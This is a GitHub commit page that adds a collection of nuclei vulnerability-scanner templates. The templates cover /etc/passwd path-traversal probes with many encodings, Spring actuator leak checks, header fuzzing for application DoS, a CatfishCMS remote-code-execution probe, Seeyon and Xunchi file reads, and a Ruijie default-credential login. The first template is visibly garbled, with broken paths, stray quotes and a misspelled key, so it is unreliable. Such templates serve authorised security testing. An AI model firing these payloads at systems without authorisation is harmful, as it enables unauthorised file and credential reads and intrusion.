Skip to content

Commit

Permalink
first commit
Browse files Browse the repository at this point in the history
  • Loading branch information
@ping-0day
ping-0day committed Mar 1, 2022
0 parents commit b233279
Show file tree
Hide file tree
Showing 4,383 changed files with 151,295 additions and 0 deletions.
The diff you're trying to view is too large. We only load the first 3000 changed files.
Binary file added .DS_Store
Binary file not shown.
110 changes: 110 additions & 0 deletions 2.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,110 @@
id: Etc-file



info:
name: Etc File Read
author: Saimon
severity: high
description: Finds etc password files




requests:
- method: GET

path:
- |
- "{{BaseURL}}swd"
- "{{BaseURL}}passwd"
- "{{BaseURL}}tc/passwd{{BaseURL}}"
- "{{BaseURL}}"
- "{{BaseURL}}"
- "{{BaseURL}}asswd"
- "{{BaseURL}}etc/passwd"
- "{{BaseURL}}.%2f/etc/passwd"
- "{{BaseURL}}.%2f..%2f/etc/passwd"
- "{{BaseURL}}.%2f..%2f..%2f/etc/passwd"
- "{{BaseURL}}""
- "
- "{{BaseURL}}passwd"
- "{{BaseURL}}e//etc/passwd"
- "{{BaseURL}}e/%2e%2e//etc/passwd"
- "{{BaseURL}}e/%2e%2e/%2e%2e//etc/passwd"
- "{{BaseURL}}e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"
- "{{BaseURL}}e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd{{BaseURL}}""
- "
- "{{BaseURL}}swd"
- "{{BaseURL}}f/etc/passwd"
- "{{BaseURL}}f%2e%2e%2f/etc/passwd"
- "{{BaseURL}}f%2e%2e%2f%2e%2e%2f/etc/passwd"
- "{{BaseURL}}f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd"
- "{{BaseURL}}f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd"
- "{{BaseURL}}f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd{{BaseURL}}"
- "{{BaseURL}}""
- "
- "{{BaseURL}}passwd"
- "{{BaseURL}}2f/etc/passwd"
- "{{BaseURL}}2f..%252f/etc/passwd"
- "{{BaseURL}}2f..%252f..%252f/etc/passwd"
- "{{BaseURL}}2f..%252f..%252f..%252f/etc/passwd"
- "{{BaseURL}}2f..%252f..%252f..%252f..%252f/etc/passwd{{BaseURL}}""
- "
- "{{BaseURL}}/passwd"
- "{{BaseURL}}e%252e//etc/passwd"
- "{{BaseURL}}e%252e/%252e%252e//etc/passwd"
- "{{BaseURL}}e%252e/%252e%252e/%252e%252e//etc/passwd"
- "{{BaseURL}}e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd"
- "{{BaseURL}}e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd"
- "{{BaseURL}}e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd{{BaseURL}}""
- "
- "{{BaseURL}}252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd{{BaseURL}}"
- "{{BaseURL}}"
- "{{BaseURL}}"
- "{{BaseURL}}"
- "{{BaseURL}}""
- "
- "{{BaseURL}}swd"
- "{{BaseURL}}passwd"
- "{{BaseURL}}tc/passwd{{BaseURL}}"
- "{{BaseURL}}""
- "
- "{{BaseURL}}passwd"
- "{{BaseURL}}5c/etc/passwd"
- "{{BaseURL}}5c..%255c/etc/passwd"
- "{{BaseURL}}5c..%255c..%255c/etc/passwd"
- "{{BaseURL}}5c..%255c..%255c..%255c/etc/passwd"
- "{{BaseURL}}5c..%255c..%255c..%255c..%255c/etc/passwd{{BaseURL}}""
- "
- "{{BaseURL}}/passwd..%5c/etc/passwd{{BaseURL}}"
- "{{BaseURL}}""
- "
- "{{BaseURL}}asswd"
- "{{BaseURL}}etc/passwd"
- "{{BaseURL}}.%5c/etc/passwd"
- "{{BaseURL}}.%5c..%5c/etc/passwd"
- "{{BaseURL}}.%5c..%5c..%5c/etc/passwd{{BaseURL}}"
- "{{BaseURL}}""
- "
- "{{BaseURL}}passwd"
- "{{BaseURL}}e\/etc/passwd"
- "{{BaseURL}}e\%2e%2e\/etc/passwd"
matcher-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*] :0:0"
- "\\[(font|extension|file)s\\]"

part: body
13 changes: 13 additions & 0 deletions 74cms-workflow.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
id: 74cms-workflow

info:
name: 74cms Security Checks
author: daffainfo
description: A simple workflow that runs all 74cms related nuclei templates on a given target.

workflows:
- template: technologies/fingerprinthub-web-fingerprints.yaml
matchers:
- name: 74cms
subtemplates:
- tags: 74cms
34 changes: 34 additions & 0 deletions Actuator.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
id: Finds actuator
info:
name: Actuator info leakage
author: Clark
severity: meduim
#Look in for exposed info.
requests:
- method: GET
path:
- "{{BaseURL}}/actuator"
- "{{BaseURL}}/actuator/caches"
- "{{BaseURL}}/actuator/configprops"
- "{{BaseURL}}/actuator/conditions"
- "{{BaseURL}}/actuator/env"
- "{{BaseURL}}/actuator/beans"
- "{{BaseURL}}/actuator/info"
- "{{BaseURL}}/actuator/scheduledtasks"
- "{{BaseURL}}/actuator/features"
- "{{BaseURL}}/actuator/refresh"
- "{{BaseURL}}/actuator/metrics"
- "{{BaseURL}}/actuator/loggers"
- "{{BaseURL}}/actuator/mappings"
- "{{BaseURL}}/actuator/threaddump"

matchers-condition: and
matchers:
- type: word
words:
- actuator
condition: and

- type: status
status:
- 200
32 changes: 32 additions & 0 deletions Application_level_dos.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,32 @@
id: Application-dos

info:
name: Application_level_dos
author: MR.iambatman
severity: critical
description: application_dos

requests:

- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
§header§: ab72a99f16a2ff1249c98ccbd2916fa8
payloads:
header: helpers/payloads/request-headers.txt

attack: clusterbomb
redirects: true

matchers:
- type: status
status:
- 500
- 503
- 502
- 504

25 changes: 25 additions & 0 deletions CNNVD-200705-315.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
id: cnnvd-200705-315
info:
name: Caucho Resin Information Disclosure
author: princechaddha
severity: high
reference: |
- http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315
tags: resin,caucho,lfr

requests:
- method: GET
path:
- "{{BaseURL}}/%20../web-inf/"
matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "/ ../web-inf/"
- "Directory of /"
condition: and
part: body
29 changes: 29 additions & 0 deletions CNVD-2019-01348.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: CNVD-2019-01348

info:
name: Xiuno BBS CNVD-2019-01348
author: princechaddha
severity: medium
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
tags: xiuno,cnvd,cnvd2019

requests:
- method: GET
path:
- "{{BaseURL}}/install/"
headers:
Accept-Encoding: deflate

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
part: body
words:
- "/view/js/xiuno.js"
- "Choose Language (选择语言)"
condition: and
27 changes: 27 additions & 0 deletions CNVD-2019-06255.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@
id: CNVD-2019-06255

info:
name: CatfishCMS RCE
author: Lark-Lab
severity: medium
reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
tags: rce,cnvd,catfishcms,cnvd2019

requests:
- method: GET
path:
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- 'OS'
- 'PATH'
- 'SHELL'
- 'USER'
condition: and
27 changes: 27 additions & 0 deletions CNVD-2020-23735.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@
id: CNVD-2020-23735

info:
name: Xxunchi Local File read
author: princechaddha
severity: medium
description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.
reference: https://www.cnvd.org.cn/flaw/show/2025171
tags: xunchi,lfi,cnvd,cnvd2020

requests:
- method: GET
path:
- "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
part: body
words:
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
- "display_errors"
condition: and
30 changes: 30 additions & 0 deletions CNVD-2020-56167.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
id: CNVD-2020-56167

info:
name: Ruijie Smartweb Default Password
author: pikpikcu
severity: low
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
tags: ruijie,default-login,cnvd

requests:
- method: POST
path:
- "{{BaseURL}}/WEB_VMS/LEVEL15/"
headers:
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
body: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.

matchers-condition: and
matchers:

- type: word
words:
- "Level was: LEVEL15"
- "/WEB_VMS/LEVEL15/"
part: body
condition: and

- type: status
status:
- 200
29 changes: 29 additions & 0 deletions CNVD-2020-62422.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: CNVD-2020-62422

info:
name: Seeyon readfile(CNVD-2020-62422)
author: pikpikcu
severity: medium
reference: https://blog.csdn.net/m0_46257936/article/details/113150699
tags: lfi,cnvd

requests:
- method: GET
path:
- "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties"

matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/x-msdownload"
condition: and
part: header
- type: word
words:
- "ctpDataSource.password"
condition: and
part: body
Loading

0 comments on commit b233279

Please sign in to comment.